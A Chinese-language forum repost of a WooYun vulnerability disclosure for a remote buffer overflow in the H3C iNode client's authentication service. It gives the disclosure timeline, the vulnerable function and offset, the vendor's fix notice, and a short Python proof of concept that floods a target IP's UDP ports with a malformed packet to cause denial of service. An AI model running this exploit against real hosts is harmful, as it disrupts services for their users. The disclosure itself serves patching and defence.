Board logo

标题: H3CiNode客户端远程缓冲区溢出拒绝服务0Day漏洞 [打印本页]

作者: linda    时间: 2015-1-4 12:05     标题: H3CiNode客户端远程缓冲区溢出拒绝服务0Day漏洞

漏洞概要
缺陷编号:        WooYun-2013-21661
漏洞标题:        iNode远程缓冲区溢出拒绝服务0Day漏洞
相关厂商:        杭州华三通信技术有限公司
漏洞作者:        cssembly
提交时间:        2013-04-12 10:34
公开时间:        2013-07-11 10:34
漏洞类型:        拒绝服务
危害等级:        高
自评Rank:        20
漏洞状态:        已交由第三方厂商(cncert国家互联网应急中心)处理
漏洞来源:        http://www.wooyun.org
Tags标签:       拒绝服务 客户端安全 远程拒绝服务 边界越位

漏洞详情披露状态:
2013-04-12:        细节已通知厂商并且等待厂商处理中
2013-04-16:        厂商已经确认,细节仅向厂商公开
2013-04-19:        细节向第三方安全合作伙伴开放
2013-04-26:        细节向核心白帽子及相关领域专家公开
2013-05-06:        细节向普通白帽子公开
2013-05-26:        细节向实习白帽子公开
2013-07-11:        细节向公众公开

简要描述:H3C iNode是杭州华三通信技术有限公司设计开发的一款用于用户认证上网的管理软件,该软件存在缓冲区溢出漏洞,攻击者可以远程发送攻击数据包,触发漏洞溢出,导致拒绝服务。
详细说明:该漏洞存在于iNode软件安装后的AuthenMngService.exe文件中,它被注册为一个服务程序,以管理员权限运行,可接收网络上发送的udp数据包。以最新版iNode PC 5.2 (E0402)为例,漏洞位置在IDA反汇编结果的sub_459F10函数中,漏洞位置为0x45A2E2处的内存拷贝函数,如图





拷贝数据长度字段可控,通过畸形数据就能导致远程拒绝服务攻击。

漏洞证明:poc.py代码如下:

import socket

import time



Exploit_addr = raw_input( "input attack ip addr : " )



s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)



exploit_data='\x00\x01'+'A'*14+'\x74\x02\x64\x72\x1D\xA7\x9C\xC1\xBF\xBA\x86\x4C\x57\xEF\xCB\x78' + '\x3D\x01\x01\x11\x01'



for port in range( 1024 , 65535):

address = ( Exploit_addr , port )

s.sendto( exploit_data , address )

print 'port : ' , port

time.sleep(0.001)



s.close()

print 'Exploit End'

raw_input()



同之前提交的漏洞。但是无法执行任意代码

修复方案:
版权声明:转载请注明来源 cssembly@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2013-04-16 23:17
厂商回复:
最新状态:2013-04-23:4月23日,经过CNVD协调,H3C(华三公司)已经发布了针对漏洞的解决方案,发布了新的inode版本。 参考链接: http://kms.h3c.com/kms/kms/search/view.html?id=23553
原文:http://www.wooyun.org/bugs/wooyun-2010-021661

[ 本帖最后由 linda 于 2016-2-16 16:07 编辑 ]




欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/) Powered by Discuz! 6.0.0